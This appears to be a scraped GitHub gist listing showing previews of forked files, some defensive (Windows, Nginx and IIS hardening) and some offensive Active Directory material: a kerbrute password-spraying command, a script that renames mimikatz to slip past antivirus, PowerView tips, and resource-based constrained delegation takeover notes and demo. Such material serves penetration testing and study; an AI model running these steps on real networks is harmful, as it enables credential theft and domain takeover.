With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Michael Ritter michiiii
michiiii
/ Harden.ps1
Created
February 25, 2023 23:13
— forked from hanfil/Harden.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Enable Windows Firewall | |
| Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True | |
| # SMB # require elevated privileges # | |
| ## Turn on SMB signing and encryption | |
| Set-SmbServerConfiguration -RequireSecuritySignature $True -EnableSecuritySignature $True -EncryptData $True -Confirm:$false -Verbose | |
| ## Turn off the default workstations shares | |
| Set-SmbServerConfiguration -AutoShareWorkstation $False -Confirm:$false -Verbose |
michiiii
/ PowerView-3.0-tricks.ps1
Created
November 23, 2021 13:29
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
michiiii
/ mimikatz_obfuscator.sh
Created
November 23, 2021 13:28
— forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Mimikatz Obfuscator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/candycrush | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' |
michiiii
/ kerberos_attacks_cheatsheet.md
Created
November 23, 2021 13:24
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
michiiii
/ Workstation-Takeover.md
Created
November 23, 2021 13:23
— forked from S3cur3Th1sSh1t/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
michiiii
/ rbcd_demo.ps1
Created
April 28, 2021 07:20
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
michiiii
/ Jenkinsfile
Created
April 28, 2021 07:18
— forked from HarmJ0y/Jenkinsfile
Rubeus Jenkinsfile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @Library('ci-jenkins-common') _ | |
| // Jenkins build pipeline (declarative) | |
| // Project: Seatbelt | |
| // URL: https://github.com/GhostPack/Seatbelt | |
| // Author: @tifkin_/@harmj0y | |
| // Pipeline Author: harmj0y | |
| def gitURL = "https://github.com/GhostPack/Seatbelt" |
michiiii
/ nginx-tls.conf
Created
March 17, 2021 20:01
— forked from gavinhungry/nginx-tls.conf
Nginx SSL/TLS configuration for "A+" Qualys SSL Labs rating
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Name: nginx-tls.conf | |
| # Auth: Gavin Lloyd <gavinhungry@gmail.com> | |
| # Desc: Nginx SSL/TLS configuration for "A+" Qualys SSL Labs rating | |
| # | |
| # Enables HTTP/2, PFS, HSTS and OCSP stapling. Configuration options not related | |
| # to SSL/TLS are not included here. | |
| # | |
| # Additional tips: | |
| # |
michiiii
/ setupiisforsslperfectforwardsecrecy_v17.ps1
Created
March 17, 2021 19:55
— forked from jbratu/setupiisforsslperfectforwardsecrecy_v17.ps1
Great powershell script for tightening HTTPS security on IIS and disabling insecure protocols and ciphers. Very useful on core installations.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright 2019, Alexander Hass | |
| # https://www.hass.de/content/setup-microsoft-windows-or-iis-ssl-perfect-forward-secrecy-and-tls-12 | |
| # | |
| # After running this script the computer only supports: | |
| # - TLS 1.2 | |
| # | |
| # Version 3.0.1, see CHANGELOG.txt for changes. | |
| Write-Host 'Configuring IIS with SSL/TLS Deployment Best Practices...' | |
| Write-Host '--------------------------------------------------------------------------------' |